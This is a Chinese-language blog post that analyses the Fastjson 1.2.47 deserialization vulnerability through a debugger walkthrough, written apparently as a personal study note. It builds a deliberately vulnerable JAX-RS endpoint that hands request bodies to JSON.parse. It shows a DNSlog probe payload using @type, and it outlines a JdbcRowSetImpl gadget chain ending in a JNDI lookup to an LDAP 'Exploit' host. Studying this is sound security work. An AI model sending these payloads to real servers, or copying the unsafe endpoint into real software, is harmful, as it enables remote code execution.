<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Dawn Nine学习笔记
    </title>
    <meta name="description" content=  >
    <meta name="keywords" content= Dawn Nine,代码学习 >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.3.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            fastjson漏洞分析
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="fastjson漏洞分析"><a href="#fastjson漏洞分析" class="headerlink" title="fastjson漏洞分析"></a>fastjson漏洞分析</h1><h2 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h2><p><code>Fastjson</code>是阿里巴巴的开源JSON解析库，可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。攻击者可以利用该漏洞执行任意代码，导致严重的安全威胁。	</p>
<h2 id="项目创建"><a href="#项目创建" class="headerlink" title="项目创建"></a>项目创建</h2><p>首先创建项目，再把下面的依赖添加到pom文件中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;com.alibaba&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;fastjson&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;1.2.47&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.fast;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSONObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.ws.rs.*;</span><br><span class="line"><span class="keyword">import</span> javax.ws.rs.core.MediaType;</span><br><span class="line"><span class="keyword">import</span> javax.ws.rs.core.Response;</span><br><span class="line"></span><br><span class="line"><span class="meta">@Path(&quot;/hello&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">HelloResource</span> &#123;</span><br><span class="line">    <span class="meta">@GET</span></span><br><span class="line">    <span class="meta">@Produces(&quot;text/plain&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">hello</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Hello, World!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="meta">@POST</span></span><br><span class="line">    <span class="meta">@Path(&quot;/data&quot;)</span></span><br><span class="line">    <span class="meta">@Consumes(MediaType.APPLICATION_JSON)</span></span><br><span class="line">    <span class="meta">@Produces(MediaType.APPLICATION_JSON)</span></span><br><span class="line">    <span class="keyword">public</span> Response <span class="title function_">unsafeDeserialize</span><span class="params">(String jsonString)</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line"></span><br><span class="line">            <span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> JSON.parse(jsonString);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> Response.ok()</span><br><span class="line">                    .entity(<span class="string">&quot;&#123;\&quot;status\&quot;:\&quot;success\&quot;,\&quot;result\&quot;:\&quot;&quot;</span> + obj.toString() + <span class="string">&quot;\&quot;&#125;&quot;</span>)</span><br><span class="line">                    .build();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">return</span> Response.status(<span class="number">500</span>)</span><br><span class="line">                    .entity(<span class="string">&quot;&#123;\&quot;status\&quot;:\&quot;error\&quot;,\&quot;message\&quot;:\&quot;&quot;</span> + e.getMessage() + <span class="string">&quot;\&quot;&#125;&quot;</span>)</span><br><span class="line">                    .build();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>​	创建一个带有data路由，并接收参数由 JSON.parse进行处置。</p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260223163114096.png" alt="image-20260223163114096"></p>
<p>​	当访问hello时能正常显示hello word项目搭建完成。</p>
<p>​	当对这个包进行变形的时候一定要对<strong>Content-Type</strong>:的类型填成application&#x2F;json，这样后端的服务器才会对数据按照json格式进行解析。</p>
<h2 id="DNSlog漏洞分析"><a href="#DNSlog漏洞分析" class="headerlink" title="DNSlog漏洞分析"></a>DNSlog漏洞分析</h2><p>首先对网上的POC进行断点分析</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;aa&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span><span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.net.Inet4Address&quot;</span><span class="punctuation">,</span><span class="attr">&quot;val&quot;</span><span class="punctuation">:</span><span class="string">&quot;dnslog&quot;</span><span class="punctuation">&#125;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224192905952.png" alt="image-20260224192905952"></p>
<p>当前端传入的json格式的数据，会由JSON.parse()函数进行处置</p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224193155070.png" alt="image-20260224193155070"></p>
<p>通过调用堆栈代码分析，最终处置是由parser.parse()方法，之后会调用parseObject()分析parseObject方法，它会检测该值是否为，并且关闭了特殊键检测的功能。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (key == JSON.DEFAULT_TYPE_KEY &amp;&amp; !lexer.isEnabled(Feature.DisableSpecialKeyDetect))</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">String</span> <span class="variable">DEFAULT_TYPE_KEY</span> <span class="operator">=</span> <span class="string">&quot;@type&quot;</span>;</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224195335088.png" alt="image-20260224195335088"></p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224195503366.png" alt="image-20260224195503366"></p>
<p>​	因为是按照顺序读的键值对现在为aa，直接跳过。接下来判断是否包含$ref和是否开启</p>
<blockquote>
<p>​	$ref这个是检测是否为循环调用,后期绕过部分使用</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (key == <span class="string">&quot;$ref&quot;</span> &amp;&amp; context != <span class="literal">null</span> &amp;&amp; !lexer.isEnabled(Feature.DisableSpecialKeyDetect)</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224200551488.png" alt="image-20260224200551488"></p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224201526152.png" alt="image-20260224201526152"></p>
<p>当进行检测到@type包含这个时会走入</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (key == JSON.DEFAULT_TYPE_KEY &amp;&amp; !lexer.isEnabled(Feature.DisableSpecialKeyDetect))</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224202119173.png" alt="image-20260224202119173"></p>
<p>在353行进行回去@type的值进行反序列化走到了MiscCodec.deserialze()中</p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224202240807.png" alt="image-20260224202240807"></p>
<p>通过再一次的parser.parse()获取到stringVal最后再由InetAddress.getByName(strVal)来请求dnslog<img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224203038978.png" alt="image-20260224203038978"></p>
<p><img src="/2026/02/23/fastjson%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20260224203354160.png" alt="image-20260224203354160"></p>
<h2 id="反序列化后续RCE链条"><a href="#反序列化后续RCE链条" class="headerlink" title="反序列化后续RCE链条"></a>反序列化后续RCE链条</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">JSON.parseObject()/JSON.parse()</span><br><span class="line">	DefaultJSONParser.parse()</span><br><span class="line">		DefaultJSONParser.parseObject()</span><br><span class="line">			JavaBeanDeserializer.deserialze()</span><br><span class="line">    		  FieldDeserializer.setValue()</span><br><span class="line">           	   TypeUtils.cast()</span><br><span class="line">     			TypeUtils.loadClass() // 加载 JdbcRowSetImpl 类 (或从缓存中获取)</span><br><span class="line">     			JavaBeanDeserializer.deserialze() // 反序列化 JdbcRowSetImpl 对象</span><br><span class="line">       				FieldDeserializer.setValue() // 设置 dataSourceName 属性</span><br><span class="line">       				FieldDeserializer.setValue() // 设置 autoCommit 属性</span><br><span class="line">						JdbcRowSetImpl.setAutoCommit(true)</span><br><span class="line">         					JdbcRowSetImpl.connect()</span><br><span class="line">          					 JndiDataSource.getConnection()</span><br><span class="line">           					 JndiContext.lookup(&quot;ldap://192.168.139.1:1389/Exploit&quot;)//JNDI注入</span><br></pre></td></tr></table></figure>

<p>​	反序列化等等，暂时先分析到这里</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/14309">https://xz.aliyun.com/news/14309</a></p>
</blockquote>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Dawn Nine | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
